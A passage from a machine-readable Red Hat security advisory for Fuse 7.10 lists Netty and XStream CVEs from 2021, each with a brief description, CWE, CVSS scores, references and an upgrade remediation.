"discovery_date": "2021-02-09T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1927028"
}
],
"notes": [
{
"category": "description",
"text": "In Netty there is a vulnerability on Unix-like systems involving an insecure temp file. When netty\u0027s multipart decoders are used, a local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: Information disclosure via the local system temporary directory",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21290"
},
{
"category": "external",
"summary": "RHBZ#1927028",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1927028"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21290",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21290"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21290",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21290"
}
],
"release_date": "2021-02-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "netty: Information disclosure via the local system temporary directory"
},
{
"cve": "CVE-2021-21295",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2021-03-09T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1937364"
}
],
"notes": [
{
"category": "description",
"text": "In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel\u0027s pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: possible request smuggling in HTTP/2 due missing validation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21295"
},
{
"category": "external",
"summary": "RHBZ#1937364",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1937364"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21295",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21295"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21295",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21295"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj",
"url": "https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj"
}
],
"release_date": "2021-03-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "netty: possible request smuggling in HTTP/2 due missing validation"
},
{
"cve": "CVE-2021-21341",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-03-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1942539"
}
],
"notes": [
{
"category": "description",
"text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.16.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: allow a remote attacker to cause DoS only by manipulating the processed input stream",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21341"
},
{
"category": "external",
"summary": "RHBZ#1942539",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942539"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21341",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21341"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21341",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21341"
}
],
"release_date": "2021-03-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "XStream: allow a remote attacker to cause DoS only by manipulating the processed input stream"
},
{
"cve": "CVE-2021-21342",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2021-03-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1942545"
}
],
"notes": [
{
"category": "description",
"text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request. No user is affected, who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.16.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: SSRF via crafted input stream",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21342"
},
{
"category": "external",
"summary": "RHBZ#1942545",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942545"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21342",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21342"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21342",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21342"
}
],
"release_date": "2021-03-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "XStream: SSRF via crafted input stream"
},
{
"cve": "CVE-2021-21343",
"cwe": {
"id": "CWE-552",
"name": "Files or Directories Accessible to External Parties"
},
"discovery_date": "2021-03-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1942550"
}
],
"notes": [
{
"category": "description",
"text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in the deletion of a file on the local host. No user is affected, who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.16.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: arbitrary file deletion on the local host via crafted input stream",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21343"
},
{
"category": "external",
"summary": "RHBZ#1942550",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942550"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21343",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21343"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21343",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21343"
}
],
"release_date": "2021-03-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "XStream: arbitrary file deletion on the local host via crafted input stream"
},
{
"cve": "CVE-2021-21344",
"cwe": {
"id": "CWE-434",
"name": "Unrestricted Upload of File with Dangerous Type"
},
"discovery_date": "2021-03-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1942554"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream. A remote attacker may be able to load and execute arbitrary code from a remote host only by manipulating the processed input stream. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: Unsafe deserizaliation of javax.sql.rowset.BaseRowSet",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21344"
},
{
"category": "external",
"summary": "RHBZ#1942554",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942554"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21344",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21344"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21344",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21344"
}
],
"release_date": "2021-03-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "XStream: Unsafe deserizaliation of javax.sql.rowset.BaseRowSet"
},
{
"cve": "CVE-2021-21345",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2021-03-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1942558"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream. A remote attacker, who has sufficient rights, can execute commands of the host by manipulating the processed input stream. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: Unsafe deserizaliation of com.sun.corba.se.impl.activation.ServerTableEntry",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21345"
},
{
"category": "external",
"summary": "RHBZ#1942558",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942558"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21345",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21345"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21345",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21345"
}
],
"release_date": "2021-03-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "XStream: Unsafe deserizaliation of com.sun.corba.se.impl.activation.ServerTableEntry"
},
{
"cve": "CVE-2021-21346",
"cwe": {
"id": "CWE-434",
"name": "Unrestricted Upload of File with Dangerous Type"
},
"discovery_date": "2021-03-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1942578"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream. A remote attacker can load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: Unsafe deserizaliation of sun.swing.SwingLazyValue",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21346"
},
{
"category": "external",
"summary": "RHBZ#1942578",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942578"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21346",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21346"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21346",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21346"
}
],
"release_date": "2021-03-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "XStream: Unsafe deserizaliation of sun.swing.SwingLazyValue"
},
{
"cve": "CVE-2021-21347",
"cwe": {
"id": "CWE-434",
"name": "Unrestricted Upload of File with Dangerous Type"
},
"discovery_date": "2021-03-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1942629"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream. A remote attacker may be able to load and execute arbitrary code from a remote host only by manipulating the processed input stream. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: Unsafe deserizaliation of com.sun.tools.javac.processing.JavacProcessingEnvironment NameProcessIterator",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21347"
},
{
"category": "external",
"summary": "RHBZ#1942629",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942629"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21347",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21347"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21347",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21347"
}
],
"release_date": "2021-03-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "XStream: Unsafe deserizaliation of com.sun.tools.javac.processing.JavacProcessingEnvironment NameProcessIterator"
},
{
"cve": "CVE-2021-21348",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-03-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1942633"
}
],
"notes": [
{
"category": "description",
"text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. No user is affected, who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.16.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: ReDoS vulnerability",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21348"
},
{
"category": "external",
"summary": "RHBZ#1942633",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942633"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21348",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21348"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21348",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21348"
}
],
"release_date": "2021-03-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
